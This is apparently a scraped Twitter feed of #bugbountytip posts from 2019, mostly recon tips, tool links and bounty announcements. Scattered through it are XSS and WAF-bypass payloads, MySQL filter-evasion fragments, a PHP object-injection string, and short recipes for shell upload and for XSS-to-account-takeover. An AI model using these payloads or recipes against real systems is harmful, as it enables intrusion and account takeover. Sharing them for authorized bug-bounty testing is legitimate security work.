3 Understanding HTTP Headers and cookie. Read: https://t.co/ZcHq5v6Ri8 #cybersecurity #cybersec #bugbounty #BugBountyTip #bugbountytips https://t.co/W0zQT2sn9D
intigriti
@intigriti


2019-11-11 12:46:04
6 [email protected]'s #BugBountyTip: Check JSON responses for additional properties, and send them back! 👀#HackWithIntigriti https://t.co/qIwEXtV9S8
Henry Chen
@chybeta


2019-11-11 10:54:10
0 Apache Flink Dashboard -> upload a malicious JAR -> submit new job -> getshell #bugbounty #bugbountytips #BugBountyTip https://t.co/lWNNCXHvvt
bugbountytip
@a_l_e_r_t_1_


2019-11-11 10:11:42
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/AoovNBqGht
Brodie Codie
@brodie_codie


2019-11-10 22:45:20
0 Tip 1. Passive, Active scanning and enumeration Probe the target Gather as much information about the target as possible Short List of Tools i like (Amass, Assetfinder, Pdlist, Dnsrecon, Dig, Wafw00f, Masscan, Dirsearch ) What tools do you like? #bugbountytips #BugBountyTip
ghostlulz
@ghostlulz1337


2019-11-10 22:15:04
8 You have probably heard of Subdomain Hijacking(takeover) but what how Broken Link Hijacking? You can utilize this vulnerable to get some easy Stored XSS wins. More info on my blog: https://t.co/Up6LfsdBs7 #bugbounty #bugbountytip #bugbountytips #infosec #redteam #pentest #xss https://t.co/uKA4V3uOZZ
.̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈̒̇̉̽ Halil AHMAD .̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈
@Halilahmadd


2019-11-10 21:56:46
0 Bypass is required if you need to use quotes in some encodings where single and double quotes are blocked <IMG SRC=`javascript:alert(“Halil?, ‘XSS’”)`> #BugBounty #XSS #BugBountyTip #infosec #Bypass
.̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈̒̇̉̽ Halil AHMAD .̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈
@Halilahmadd


2019-11-10 21:55:46
0 Let's say they blocked the site with nail. What will we do? Here is the solution: <IMG SRC=javascript:alert("XSS")> #BugBounty #XSS #BugBountyTip #infosec #Bypass
bugbountytip
@a_l_e_r_t_1_


2019-11-10 21:03:44
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
0day work
@0daywork


2019-11-10 20:47:57
3 #BugbountyTip: Change request parameters from scalar (val=foo) to array (val[]=foo) for #XSS #Bugbounty #OWASP https://t.co/eVOBz8WtwT
Tannay Bagga
@BaggaTannay


2019-11-10 19:56:19
0 Getting my hands on docker for building #Recon tools.I must say it makes the installation task so hassle free!#bugbountytips #opensource #BugBountyTip #Docker
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-10 19:21:56
0 Mass RDP ATTACKS #BlueKeep Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/NTSGfnFBo5
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-10 18:49:55
2 Linux Commands for Bug Hunters and Hackers !! Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip https://t.co/GIgkZB5KK9
Nick || hunt4p1zza
@ngkogkos


2019-11-10 18:33:29
2 Sometimes login endpoints submit the password twice in POST data. If you need to perform a credentials guessing attack with Burp Suite: 1) Use Cluster bomb, 2) Use "Copy other payload" to copy from 1st password placeholder. See pictures. #burpsuitetip #bugbounty #bugbountytip https://t.co/pY7ga2bbsb
Nick || hunt4p1zza
@ngkogkos


2019-11-10 18:20:31
7 I've been testing newer versions of #ffuf by @joohoi. It's dope being able to fuzz for files w/ 100 threads at 350reqs/sec w/ nearly no failures/stability issues! If you need BOTH stability & speed, then #ffuf is the only tool you need for web fuzzing. #bugbounty #BugBountyTip https://t.co/bWhywAAvVx
Ismayil Tahmazov
@Tismayil1


2019-11-10 18:20:10
5 Sometimes we have to do the impossible. SQL'Injection Attempt from Remote Site With this method: XSS, SQL'i, CSRF attacks can be done. Failure to filter the data from the remote source leaves open doors for such attacks. #bugbountytips #BugBountyTip #bugbounty #whitehat https://t.co/bb29oBdpGL
Infected Drake
@0xInfection


2019-11-10 13:33:03
8 Hey folks, v2.1.1 of XSRFProbe is out! \o/ So whether you're stuck at an endpoint with forms in it or looking to learn about how cross site request forgeries (CSRF) work, give this toolkit a try. 😉 https://t.co/OKUlxHNUO3 #infosec #appsec #bugbounty #bugbountytip https://t.co/5NMCR7YRMq
.̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈̒̇̉̽ Halil AHMAD .̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈
@Halilahmadd


2019-11-10 11:04:00
3 Indispensable xss bypass payload. ">'><details/open/ontoggle=confirm('XSS')> #BugBounty #XSS #BugBountyTip #infosec
bugbountytip
@a_l_e_r_t_1_


2019-11-10 08:26:32
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5ryR3 #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
ALL ABOUT HACKER
@AboutHacking


2019-11-10 07:35:08
0 Cross Site Scripting attack Basic to advance [ part 6] Read:https://t.co/H4hJHhsdO5 #cybersecurity #cybersec #bugbounty #BugBountyTip #bugbountytips https://t.co/HkDrjRxblY
Shantanu Kulkarni
@Iamshantanukul


2019-11-10 06:58:55
0 If u can determine which opn source packages r usd in d application u r attacking ,u can download these n perform a code review or install them to experiment on. vulnerability in any of these may be exploitable to compromise d wider application #BugBountyTip #bugcrowd #hackerone
Hussein Daher
@HusseiN98D


2019-11-10 00:02:37
15 Sharing one of my secrets #BugBountyTip When discovering subdomains/domains/assets owned by a company, use the Google Analytics ID to expand your attack surface. The ID is in the HTML code. Reverse search then: https://t.co/fkWSWj8GUn RT once this helps!#bugbountytips #infosec
ALL ABOUT HACKER
@AboutHacking


2019-11-09 20:55:07
0 Cross Site Scripting Attack Series [ Baisc to Advance] Read: https://t.co/xZTIBcHlHr #cybersecurity #bugbounty #bugbountytip #bugbountytips #hacking https://t.co/QCQPhiYPtu
Murdockz
@Murdockz_CEH


2019-11-09 20:45:45
1 Remember this picture and date it was posted. When I share that I was rewarded XXXXX amount for a bug...you now know why. Step back learn and work hard to hit harder. 😎 #bugbountytips #bugbountytip #StayHumble https://t.co/69lsVZNGPt
Paulos Yibelo
@PaulosYibelo


2019-11-09 18:04:05
1 I started seeing posts about escalating bugs for maximum impact. This is an article I wrote about how to escalate XSS for maximum gain back in Feb 2018: https://t.co/W7sZLunr6N #BugBounty #BugBountyTip #BoomerAdvice
Avi
@avileox


2019-11-09 03:28:43
2 Small Python library that makes it easy to exploit race conditions in web apps with Requests https://t.co/bkBGTn8SNu #bugbounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-11-09 00:11:43
0 Less than 1$ (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Ismayil Tahmazov
@Tismayil1


2019-11-08 23:16:27
2 I Earned $XXXX OS Command Injection Private Program. Used Repos 1 : Dir Searcher : https://t.co/1L6MutcaEc 2 : Sub Scanner : https://t.co/ZRcZb6ovUa #BugBounty #bugbountytips #bugbountytip #whitehat https://t.co/OPOc6mVkTc
Ammar Amer🇸🇾
@cry__pto


2019-11-08 21:34:35
7 -Hacking for Beginners.pdf: https://t.co/aQoLE86OKL -HTB: CTF.pdf: https://t.co/PCbL2YSGZR -HTB_ Hackback.pdf: https://t.co/Jz1m0qlU2a -Keep Calm and Hack The Box - Devel.pdf: https://t.co/Jz1m0qlU2a #bugbountytips #Hacking #redteam #Pentesting #infosec #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-11-08 13:20:02
0 Less than 1$ .. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Brute Logic
@brutelogic


2019-11-07 23:37:34
1 Great stuff here, check this out! #bugbountytip #IDOR #BOLA https://t.co/2q0MbSeOie
Arif Khan
@payloadartist


2019-11-07 21:25:23
2 LiveTargetsFinder - tool to automate #bugbounty recon. #bugbountytip https://t.co/aP0oQC0qdr
Nick || hunt4p1zza
@ngkogkos


2019-11-07 17:47:02
0 Agree with Jason here, it is a good #bugbountytip but need to be cautious. I would only set up an AutoRepeater/Burp rule for true/false, if I was highly familiar with my test user's data and the website's behavior. #bugbounty https://t.co/iMVChw8zkX
Karna
@karna__1


2019-11-07 15:41:35
0 Burned out? Bored? Need a really cool time-pass? I dare you to enter https://t.co/sJMORd6dlX All the @PortSwiggerRes content are 🔥🔥🔥 Soo much to learn. Just go bring your geek-self out! #research #infosec #bugbountytip #bugbountytips #hackers #hacking #geeks
warbid
@id_warb


2019-11-07 14:41:19
0 Use PDO they said PDO will save you from SQL injections they said #bugbountytip https://t.co/NUtccgqMR7
intigriti
@intigriti


2019-11-07 13:04:04
18 Looking for business logic flaws 👀? Flows with multiple steps are a good place to start. Try to skip steps or execute them in a wrong order and see what happens 😈 Thanks for the #BugBountyTip, @InsiderPhD! https://t.co/bw6Z28K6fE
bugbountytip
@a_l_e_r_t_1_


2019-11-07 06:51:34
0 Now, recon tools are added.. Less than 1$ .. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
darkmage
@therealdarkmage


2019-11-06 22:22:45
0 Got a $50 Amazon giftcard for reporting an #XSS to a company with no #bugbounty program. #bugbountytip: If you find a bug on a website/app that does not appear to have an active program, take heart and have courage and faith! Report it and see if they can compensate you🤘#infosec https://t.co/2Kql2FconG
Vinothkumar
@vinothpkumar


2019-11-06 16:57:18
0 Wrote a blog on "Publicly Exposed AWS SNS Topics" #bugbounty #Bugbountytip #aws #security https://t.co/wfNbUHHpjT
Pavandeep
@Pavandep8


2019-11-06 16:12:14
2 Look what I shared: When I found iframe injection and illegal redirect (dom based) @MIUI| #Hacker #privacy #Bugbountytip #security https://t.co/TnU1JRjUDm
intigriti
@intigriti


2019-11-06 15:34:54
12 Sometimes, TRUE is all you need ✅. Use @Burp_Suite's match and replace to enable new functionalities in the UI and expand your attack surface! Thanks for the #BugBountyTip, @anshuman_bh! https://t.co/D55uMIl6Sx
Aditya Soni
@hetroublemakr


2019-11-06 14:43:08
0 Still any confusion about CVE2019 14287 Go and watch this video #infosec #Bugbountytip https://t.co/i4Mye3n7qO
Jinone
@jinonehk


2019-11-06 04:38:05
4 My first bounty blog post Get the full content of the private project internal network via ssrf https://t.co/MhKS2w6L0Z Thanks @Hacker0x01 #TogetherWeHitHarder #BugBounty #bugbountytip
Arif Khan
@payloadartist


2019-11-05 19:42:20
2 Very creative way to Abuse (cross-site authenticated) HEAD Requests leading to GitHub Oauth Bypass by @not_aardvark https://t.co/dX0lF2LVJ4 #bugbounty #bugbountytip
Abay
@abaykandotcom


2019-11-05 18:59:39
0 Actually these 2 findings are invalid. However, the interesting part is where and how the XSS payload is triggered~ #ripenglish #XSS #bugbountytip #bugbounties #bugbounty https://t.co/idpR2U41zn
YogoshaOfficial
@YogoshaOfficial


2019-11-05 16:10:19
5 [#Bugbountytip] Tomcat is used, yet, port 8080 filtered? use port 8009 which is forgotten “often”. It uses AJP instead of HTTP so you your local apache as local proxy to convert traffic from HTTP to AJP. ProxyPass / ajp://target-ip:8009/ ProxyPassReverse / ajp://target-ip:8009/
Felix Kybranz
@_cybrg


2019-11-05 12:53:54
0 Got to many results from google dorks? Remove uninteresting buzzwords with: "-" site:http://paypal. com -demo -Capital Why did I miss that for so long!? Finding that was a nice wtf-moment😇 #BugBounty #bugbountytips #bugbountytip #bugbounties
m0z
@LooseSecurity


2019-11-05 12:05:14
6 #BugBounty #bugbountytip #XSS Have an XSS and want to get account takeover but document.cookie isn't working? Try a payload which grabs the CSRF token, and then sends a request to the change email endpoint to change it to your email! Now your bug is twice as valuable. ;)
bugbountytip
@a_l_e_r_t_1_


2019-11-05 07:39:35
0 Reflected XSS on Magento #BugBountyTip #BugBountyTips https://t.co/KQSpPV2Q0m via @YouTube
Anshuman Pattnaik
@anspattnaik


2019-11-05 00:29:38
0 #bugbountytip #Google I got a strange thing to know that if google user gives certain access to a third party application then as per google policy guidelines that third application has complete ownership of the user's private information such Gmail, Drive and other services.
(((Gamliel)))
@Gamliel_InfoSec


2019-11-05 00:19:18
0 If u are pentesting/bug hunting in some web app that uses JSON and it runs on IIS, don't forget to test "JSON Parameter Pollution". Under some conditions u can poisoning some parameters, break Javascript context and voilá ... #XSS #hack2learn #GivingBack2Community #BugBountyTip https://t.co/MjN3o8pVgH
m0z
@LooseSecurity


2019-11-04 22:46:32
3 Here's a useful #XSS payload with doesn't suffix "prompt" with any parenthesis! Object.defineProperty(window, 'p', { get: prompt });p; By using a Getter, we invoke the prompt without any input! Ideal for bypassing WAF! #BugBounty #bugbountytips #bugbountytip #bugbounties
bugbountytip
@a_l_e_r_t_1_


2019-11-04 21:22:01
0 Now, recon tools are added.. Less than 1$ .. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Ashish Kunwar
@D0rkerDevil


2019-11-04 15:32:18
1 Found Java_rmi service on port 8001 , used nmap "rmi dumregistery" script to dump the class path Found some goodies .. #bugbounty #bugbountytips #bugbountytip #security
KNOXSS
@knoxss_me


2019-11-04 13:46:16
1 One of #KNOXSS exclusive features! #XSS #bugbountytip https://t.co/SDP6thBcrz
Ashish Kunwar
@D0rkerDevil


2019-11-04 12:21:16
1 #bugbountytip look out for port 2181 - zookeeper , check if you are able to commands , as there is no auth in place by default in zookeeper installations. #bountytip #bugbountytips #protips #bugbounty #security
Leonel Emiliano
@leoalgare


2019-11-04 12:09:59
0 POST request with json body with no csrf token but also no CORS ? Always test change the content-type to urlencoded... It works like a charm. #bugbountytips #bugbountytip #hackerone #CSRF #Hacker0x01
Milind Purswani
@MilindPurswani


2019-11-03 17:38:13
0 Had a pyserver running on my VPS for days. Shodan scanned it and saved the response lol. Is this how "karma" works? #bugbountytip
VT10 Loading 🥊🥊🔥🔥🔥
@SHIVAPURI12


2019-11-03 17:10:49
1 #MegaStar Lu oorike ayiporu,, aaaaah style,,,aaah energy ,, aaah Grace,, Ever green and Irreplaceable ,, #BossForAReason #MegaStatChiranjeevi Garu ❤️💓❤️ at #bugbountytip finals,, #EmperorOfEntertainment #MegaStar #ChiruForEver Thanks to @StarMaa
Maulik Vaidh🇮🇳 @bsidesahmedabad
@Maulik1827


2019-11-03 15:46:18
0 @bsidesahmedabad 12 Days to go... Are you excited?😃😃 #bsides #bsidesahmedabad #bugbountytip #infosec #hacking #security #conference #BugBounty https://t.co/EjmNa9ukkn
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍 🎃
@spyerror


2019-11-03 04:19:08
7 cloudflare {`XSS´} «byPASS» payloads. @spyerror🎯 🥇 $cat /<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;> 🥈 $cat /<svg%0Aonauxclick=0;[1].some(confirm)// #BugBounty #BugBountyTip #WAF #infosec
Ismayil Tahmazov
@Tismayil1


2019-11-02 20:11:49
0 Bug Reported to Author. 8K+ Active sales. Script after redirect worked admin account then stored to fortend area. #bugbounty #bugbountytips #bugbountytip https://t.co/6N1XwtnN28
Ismayil Tahmazov
@Tismayil1


2019-11-02 20:10:10
0 CodeCanyon Most Popular Item. Found : CSRF -> Stored XSS. 1 - HTML form auto submit to : admin/knowledge_base/article 2 - Payload direct worked after redirect. 3 - Admin area and Fronted area payload stored. 2/1 #bugbounty #bugbountytips #bugbountytip https://t.co/RiUgDz9GHq
Arif Khan
@payloadartist


2019-11-02 18:55:25
1 Good read: Smuggling HTTP requests over fake WebSocket connection by @0ang3el https://t.co/x1CxQyCq7u #bugbounty #bugbountytip
Arif Khan
@payloadartist


2019-11-02 16:21:33
2 Nice write up by @nj_dav on Abusing HTTP hop-by-hop Request Headers https://t.co/cEB4iFqnOG… #bugbounty #bugbountytip
Fisher
@Regala_


2019-11-02 14:28:40
2 Making the most out of live hacking events 101: 📚 Focus on learning 👥 Meet, connect and collaborate 💯 Give your absolute best always 🥳 Have fun and enjoy #bugbounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-11-02 14:27:54
1 Now, Jenkins and Jira vulns are added.. Less than 1$ .. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Arif Khan
@payloadartist


2019-11-02 13:26:40
6 Nice write up by @daveysec on Abusing HTTP hop-by-hop Request Headers https://t.co/3VwrseBOta #bugbounty #bugbountytip
Andri Wahyudi 📂
@andripwn


2019-11-02 09:41:01
0 Remote Code Executions (RCE) - Bypassing Extension .png Private_Programs on @Hacker0x01 sad this duplicate :'( #bugbounty #bugbountytip #rce https://t.co/oMPTakOseD
Nikhil Mahajan
@mahajan344


2019-11-02 09:01:49
1 Thanks @detectify for another payout. #bugbountytip : If you have a vulnerability and that can be validated on the fly, try to automate that bug with #detectify scanner. With the help of automation, you don't have to worry about target :) #bugbounty #automation #ItTakesACrowd https://t.co/LjTNwXk5Ol
bugbountytip
@a_l_e_r_t_1_


2019-11-01 17:32:16
0 https://t.co/fR7SA5JafD Let's hacking together everywhere !!! #BugBountyTip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-01 09:20:33
1 #SWAG 🏆🏆 Symantec 🏆🏆💰💰 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/EQfIvhpHD0
Ismayil Tahmazov
@Tismayil1


2019-11-01 07:25:06
0 Yes I Awarded $XXX. @instra Thanks For Bounty. #bugbounty #bugbountytip #bugbountytips
dark_warlord14
@dark_warlord14


2019-10-31 16:25:28
0 One must read blog post for beginners like me. Hats off to the author. #bugbountytips #bugbountytip https://t.co/ZtjGcCmSIz
Arif Khan
@payloadartist


2019-10-31 16:04:44
1 Wanted to add more juice to your #bugbounty recon? Grab this while its hot!!! Pricing is down to $10 from $50. Bonus - if u use my referral code, c5df8625, both of us get 500 credits more!!! #bugbountytip #halloween2019 https://t.co/WWbHqqLSHo
sagar yadav
@sagaryadav8742


2019-10-31 13:01:27
0 Happy to secure @readmeio 😍 Soon I will get a nice #swag from https://t.co/zcDAQyTUV0 Program link :- https://t.co/eRXN5RdYW0 #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #zerocopter #happy #sagaryadav8742 https://t.co/NrtLkkroHi
sagar yadav
@sagaryadav8742


2019-10-31 12:52:27
0 @zerocopter swag 😍 Happy to #secure #zerocopter #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #zerocopter #happy #sagaryadav8742 #swag https://t.co/RSdeOn5Kjb
Hussein Daher
@HusseiN98D


2019-10-31 11:01:04
0 Please RT and add your suggestions #bugbounty #infosec #bugbountytip #bugbountytips
Max
@0xw2w


2019-10-31 09:52:20
0 Found a changing session cookie, that applying to the user’s session during login to the account? Try logout CSRF + cookie setting (using XSS/CRLF inj/etc) to takeover a session when the user entered login and password again #bugbountytip #bugbounty #infosec
jub0bs
@jub0bs


2019-10-31 07:38:46
0 #bugbountytip Go deep on recon; go broad on targets.
Samet ŞAHİN
@sametsahinnet


2019-10-31 05:44:47
0 Here a Google dork for finding ports ; inurl:"https://t.co/q4DIBVJDSJ" #BugBountytip #bugbounty #bugbountytips #Hacking #TogetherWeHitHarder https://t.co/UWdzDXZyhf
(((Gamliel)))
@Gamliel_InfoSec


2019-10-31 04:00:38
0 Added to Fav and waiting to test in a new project. #infosec #hacking #bugbountytip #pentesting #oneliner https://t.co/M5HhlBC8uI
Akshansh Jaiswal
@Akshanshjaiswl


2019-10-31 01:22:25
0 Yay, I was awarded a $1,000 bounty on @Hacker0x01! Account takeover->Make victim login to attacker's account->Make victim account unable to login to his orignal account. https://t.co/JKjOn6nSaA #TogetherWeHitHarder #bugbounty #bugbountytip https://t.co/26tKODyKX4
Shaked Klein Orbach 🇮🇱
@shakedko


2019-10-30 23:10:37
0 Many times I end up finding a test.php with "SIze: 0". I tend to assume that it's there for something, so most likely I will have to guess some parameters. I tried parameth but it didn't work well. Other ideas? #BugBounty #BugBountyTip CC @joohoi - using ffuf
Mohamed R Serwah
@serWazito0


2019-10-30 22:58:55
0 😅 any idea to get privilege escalation after login to ftp using anonymous username ?? #bugbountytip
Ismayil Tahmazov
@Tismayil1


2019-10-30 22:23:15
0 New Fast Subdomain Scanner My First GO experience. Your feedback is important to me. Hopefully it benefits your business. https://t.co/2o2pfa8Pi1 #bugbounty #bugbountytip #bugbountytips https://t.co/HHgGwcRfJ9
bugbountytip
@a_l_e_r_t_1_


2019-10-30 17:57:48
0 https://t.co/fR7SA5JafD Let's hacking together everywhere !!! #BugBountyTip
m0z
@LooseSecurity


2019-10-30 17:41:20
4 A lot of Self XSS is actually just POST XSS. Check if it has a CSRF token! Use your CSRF bypassing techniques to convert it. I've done this before, turned a useless self xss into a $1,000 vulnerability! Stored self XSS? Try a login CSRF chain! #BugBounty #bugbountytip
Dhamu
@Dhamu_offensi


2019-10-30 16:51:04
0 #bugbountytip #bugbounty Don't use Automated exploit tools regarding CVE-2019-11510 - Pre-auth Arbitrary File Reading. Again I try to manually exploited successfully Data breach staff username and password via Pulse Secure Access. https://t.co/3QcJly45ez
Brute Logic
@brutelogic


2019-10-30 14:50:08
2 POI - #PHP Object Injection Leading zeroes & Arbitrary Chars Example: O:008:"stdClass":0001**s:006:"bypass";b:1;} (almost anything can be used in ** ) #bypass #bugbountytip https://t.co/A1dymKmBXV
Jake
@JCyberSec_


2019-10-30 12:00:16
0 I shall test your theory :: #bugbountytip - Don't share your #bugbountytips on Twitter as others will take your methods/tip and leave you with nothing 💰💰💵 https://t.co/OjTno2m0E1
Ismayil Tahmazov
@Tismayil1


2019-10-30 10:17:36
0 #bugbountytips Private Program Suddomains scanned with : https://t.co/LegySAU3sZ Founded new subdomain https://t.co/bLxxHsKcuc -> ApacheTomcat 1 - Dirs scanned founded dir : /files/ 2- PUT method tested and worked. 3 - Shell Uploaded. Bounty : $XXX #bugbounty #bugbountytip https://t.co/8BL8bWvETi
Learner
@LearnerHunter


2019-10-30 08:26:48
1 Here is my 3rd blog post -> https://t.co/MEIkF0X64m @TipsBug #bugbountytip Thanks
Ravindra Sisodia
@InfoSecRavindra


2019-10-30 04:22:08
1 #bugbountytip Always use -b flag in sublist3r, always.
Abdelrhman
@OufZayed


2019-10-30 02:38:45
0 Subdomains Enumeration Cheat Sheet | via:@PentesterLand https://t.co/muezGpC4xg | #recon #bugbountytip
m0z
@LooseSecurity


2019-10-30 00:49:12
0 We're now at 500 members! #BugBounty #bugbountytip #bugbountytips #bugbounties https://t.co/VAYxaqFQNI
👻in🐚
@0xerror


2019-10-29 22:45:18
0 SQLi News: @brutelogic: 'Some MySQL tricks to break some #WAFs out there. SELECT-1e1FROM`test` SELECT~1.FROM`test` SELECT\NFROM`test` [email protected]^1.FROM`test` SELECT-id-1.FROM`test` #SQLi #bypass #bugbountytip ' https://t.co/LCr62t6TKq, see more https://t.co/LbVOSRg1RN
Security Executions Code
@pwn0sec


2019-10-29 20:58:39
0 Information security & Penentration testing new facebook https://t.co/eW4Eo49aMC #bugbounty #bugbountytip #ssrf
Ismayil Tahmazov
@Tismayil1


2019-10-29 20:37:49
0 Application webview URL injection. APK decompiled and scanned. Founded function : goSupport( url ) Created test for injection : com.example.auth://https://t.co/mJqV80lTKH Result : Application opened then webview redirect to my url. #BugBounty #bugbountytip #bugbountytips https://t.co/3CAwg0cnsO
bugbountytip
@a_l_e_r_t_1_


2019-10-29 18:39:22
0 https://t.co/fR7SA5JafD Let's hacking together everywhere !!! #BugBountyTip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-29 18:29:19
7 Some MySQL tricks to break some #WAFs out there. SELECT-1e1FROM`test` SELECT~1.FROM`test` SELECT\NFROM`test` [email protected]^1.FROM`test` SELECT-id-1.FROM`test` #SQLi #bypass #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-29 17:09:22
0 The Web In Depth https://t.co/juiE7cWi2g Follow Us 💰💰💰💰 https://t.co/iNczOcXY13 Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-29 17:06:03
0 How To Become A Hacker Follow Us 💰💰 https://t.co/iNczOcXY13 Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/iYO8p512I4
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-29 17:00:50
0 Microsoft Tackles Election Security with Bug Bounties Follow Us 💰💰 https://t.co/iNczOcXY13 Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #pentesting #devsecops #cybersecurity #hackerone https://t.co/QIBjof1ffv
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-29 16:57:03
0 Bug Bounty — Tips / Tricks / JS (JavaScript Files) #Bugbounty #BugBountyTip #BugBountyTips https://t.co/GTENhwO3Qz
Avinash Jain
@logicbomb_1


2019-10-29 16:11:31
4 For developers- While developing apps with Spring boot, make sure you don't publically expose below endpoints. For Pentesters/Bug Bounty hunters- Check for below endpoints, it may contain sensitive information. #infosec #bugbounty #bugbountytip https://t.co/B5GJNJ6U4g
Shantanu Kulkarni
@Iamshantanukul


2019-10-29 14:20:45
0 Some MySQL tricks to break some #WAFs out there. SELECT-1e1FROM`test` SELECT~1.FROM`test` SELECT\NFROM`test` [email protected]^1.FROM`test` SELECT-id-1.FROM`test` Thanks to @rodoassis #SQLi #bypass #bugbountytip #bugbounty #hackerone #bugcrowd
Brute Logic
@brutelogic


2019-10-29 14:16:22
36 Some MySQL tricks to break some #WAFs out there. SELECT-1e1FROM`test` SELECT~1.FROM`test` SELECT\NFROM`test` [email protected]^1.FROM`test` SELECT-id-1.FROM`test` #SQLi #bypass #bugbountytip https://t.co/f7tKJFOcGs
Harshal
@Harshal81835744


2019-10-29 10:32:31
0 cloudflare «XSS» payload to bypass protection. {` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´} #BugBounty #BugBountyTip #WAF #infosec
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-29 09:02:16
5 Bug Bounty — Tips / Tricks / JS (JavaScript Files) Follow Us Bug Bounty $$$$-- https://t.co/iNczOcGmCt https://t.co/GTENhx5EI7 #BugBounty #BugBountyTip #JS #PenetrationTesting #pentesting #devops #devsecops #cybersecurity
Sayaan Alam
@alamsayaan


2019-10-29 04:51:56
0 It was Really a Long Way.... Finally On Google HOF @GoogleVRP #bugbounty #bugbountytips #togetherwehitharder #bugbountytip #hacking https://t.co/tB7cG6Ylyu
tololovejoi
@tolo7010


2019-10-29 03:29:31
0 Vulnerability gets your report triaged. Impact gets your report rewarded #bugbounty #bugbountytip #bugbountytips
bugbountytip
@a_l_e_r_t_1_


2019-10-29 01:17:49
0 Now 25+ download thank you. Learn & Hack & Earn more money. Good Hacking... https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Brute Logic
@brutelogic


2019-10-28 14:19:16
19 Just an obfuscated alternative to alert(1): https://t.co/JzLTOrQIgp`javas\cript:al\ert(1)` PoC: https://t.co/Xpca5KfJtf #XSS #bugbountytip
Mohamed Sayed
@FlEx0Geek


2019-10-28 12:10:44
2 Topic about Open redirect https://t.co/DfW5qOqhg5 #BugBounty #bugbountytip
Mohamed Sayed
@FlEx0Geek


2019-10-28 12:10:24
0 Topic about Open redirect https://t.co/uBte9Ledhr #BugBounty #bugbountytip
Guhan Raja (குகன் ராஜா)
@havocgwen


2019-10-28 11:49:19
0 Check API requests by adding an invalid parameter sometimes it will be reflected as error in HTML and leads to XSS :) #bugbounty #bugbountytip #API #xss
PikaChu
@intx0x80


2019-10-28 10:15:37
